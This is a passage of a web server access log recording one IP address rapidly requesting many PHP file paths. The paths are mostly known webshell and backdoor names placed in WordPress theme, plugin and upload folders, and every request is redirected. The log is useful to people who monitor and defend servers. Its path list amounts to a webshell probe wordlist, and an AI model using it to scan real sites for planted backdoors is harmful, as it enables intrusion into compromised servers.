OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:54 +0700] "GET /admin-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:44:54 +0700] "GET /web.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:54 +0700] "GET /terms.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:55 +0700] "GET /css/colors/coffee/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:55 +0700] "GET /pki-validation/license.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:55 +0700] "GET /zaza.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 192.145.125.92 - - [23/Sep/2024:02:44:56 +0700] "GET /images/smilies/file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 192.145.125.92 - - [23/Sep/2024:02:44:56 +0700] "GET /system/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:57 +0700] "GET /class-wp-pages.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.145.125.92 - - [23/Sep/2024:02:44:57 +0700] "GET /themes/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:44:57 +0700] "GET /customize/123.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:58 +0700] "GET /uploads/k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:58 +0700] "GET /widgets/atomlib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:44:58 +0700] "GET /alpha.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:44:59 +0700] "GET /themes/wp-pridmag/up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:44:59 +0700] "GET /assets/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 192.145.125.92 - - [23/Sep/2024:02:44:59 +0700] "GET /wp-admin/maint/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 192.145.125.92 - - [23/Sep/2024:02:45:00 +0700] "GET /IXR/imge.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:00 +0700] "GET /plugins/WordPressCore/ova-re.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:01 +0700] "GET /wp-class.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:01 +0700] "GET /pomo/user-new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:45:01 +0700] "GET /css/colors/blue/uploader.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:02 +0700] "GET /home.php?xsec=team HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:02 +0700] "GET /css/colors/blue/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:45:02 +0700] "GET /class-wp-session-href.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:03 +0700] "GET /wp-ver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:03 +0700] "GET /css/colors/midnight/vitoria.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:03 +0700] "GET /themes/alera/gecko.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:04 +0700] "GET /network.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:04 +0700] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 192.145.125.92 - - [23/Sep/2024:02:45:05 +0700] "GET /images/cmd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.145.125.92 - - [23/Sep/2024:02:45:05 +0700] "GET /selectrss/default.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:06 +0700] "GET /ID3getid3.lib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:06 +0700] "GET /uploads/wp_live_chat/abruzi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:07 +0700] "GET /Files/ws.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:07 +0700] "GET /pki-validation/xmlelement-settings.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:08 +0700] "GET /pki-validation/db-update.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:08 +0700] "GET /css/dist/wp-the1me.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:09 +0700] "GET /plugins/akismet/views/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:09 +0700] "GET /acme-challenge/inputs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:10 +0700] "GET /Text/options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:10 +0700] "GET /plugins/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:45:10 +0700] "GET /plugins/elementor/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:11 +0700] "GET /css/colors/modern/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 192.145.125.92 - - [23/Sep/2024:02:45:11 +0700] "GET /uploads/bak.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:11 +0700] "GET /991176.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 192.145.125.92 - - [23/Sep/2024:02:45:12 +0700] "GET /plugins/pwnd/default.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:12 +0700] "GET /uploads/cache.cleaner.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:12 +0700] "GET /inputs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 192.145.125.92 - - [23/Sep/2024:02:45:13 +0700] "GET /uploads/2020/09/eknlmor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:13 +0700] "GET /rest-api/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 192.145.125.92 - - [23/Sep/2024:02:45:13 +0700] "GET /simple.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:14 +0700] "GET /css/colors/blue/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:14 +0700] "GET /images/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:45:15 +0700] "GET /theme-compat/radio.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:15 +0700] "GET /plugins/wp-ver.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:15 +0700] "GET /pki-validation/zabi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:16 +0700] "GET /user/plugins.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:45:16 +0700] "GET /themes/twenty/twenty.php/xx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:45:17 +0700] "GET /ccx/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:17 +0700] "GET /acme-challenge/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:18 +0700] "GET /uploads/wpr-addons/forms/ss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:18 +0700] "GET /g4.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:19 +0700] "GET /wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:45:19 +0700] "GET /css/wrapper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:19 +0700] "GET /plugins/hellopress/wp_mna.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:19 +0700] "GET /js/l0k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:20 +0700] "GET /images/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:20 +0700] "GET /ID3/wp-conflg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:20 +0700] "GET /hello.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:21 +0700] "GET /plugins/fix/www.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:21 +0700] "GET /Text/mCBlbb.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:21 +0700] "GET /js/widgets/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:22 +0700] "GET /lnbgpdvr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:45:22 +0700] "GET /js/widgets/class.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:22 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:23 +0700] "GET /rss.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 192.145.125.92 - - [23/Sep/2024:02:45:23 +0700] "GET /uploads/json.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 192.145.125.92 - - [23/Sep/2024:02:45:23 +0700] "GET /js/codemirror/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:24 +0700] "GET /maint/alfa-rex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:24 +0700] "GET /iedevrth.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:45:25 +0700] "GET /plugins/seoplugins/mar.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:25 +0700] "GET /uploads/2020/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:25 +0700] "GET /uploads/wso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:45:26 +0700] "GET /ms-default-constants-ajax.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:26 +0700] "GET /footersysm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:27 +0700] "GET /plugins/abtest/abtest_admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:27 +0700] "GET /block-supports/duotones.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:28 +0700] "GET /plugins/seoplugins/db.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:28 +0700] "GET /includes/index1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:28 +0700] "GET /wp-content/plugins/hermes/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:45:29 +0700] "GET /includes/css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:29 +0700] "GET /SimplePie/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:29 +0700] "GET /rest-api/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 192.145.125.92 - - [23/Sep/2024:02:45:30 +0700] "GET /404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:31 +0700] "GET /pekok.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:31 +0700] "GET /images/thumbs.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 192.145.125.92 - - [23/Sep/2024:02:45:31 +0700] "GET /plugins/pwnd/fai.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 192.145.125.92 - - [23/Sep/2024:02:45:32 +0700] "GET /fonts/rk2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:32 +0700] "GET /network/checkbex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:33 +0700] "GET /plugins/pwnd/1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:33 +0700] "GET /cheeshot.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 192.145.125.92 - - [23/Sep/2024:02:45:34 +0700] "GET /moez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:34 +0700] "GET /news/gale.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:34 +0700] "GET /dropdown.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:35 +0700] "GET /wp-style-functions.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:35 +0700] "GET /images/upfile.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:35 +0700] "GET /images/3374efa125.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 192.145.125.92 - - [23/Sep/2024:02:45:36 +0700] "GET /plugins/backup-backup/includes/backup-heart.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 192.145.125.92 - - [23/Sep/2024:02:45:36 +0700] "GET /themes/evita/issue.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:36 +0700] "GET /plugins/ph-file-manager/wp-file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:36 +0700] "GET /pki-validation/validation.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:37 +0700] "GET /uploads/moon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:37 +0700] "GET /classwithtostring.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 192.145.125.92 - - [23/Sep/2024:02:45:38 +0700] "GET /js/as.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 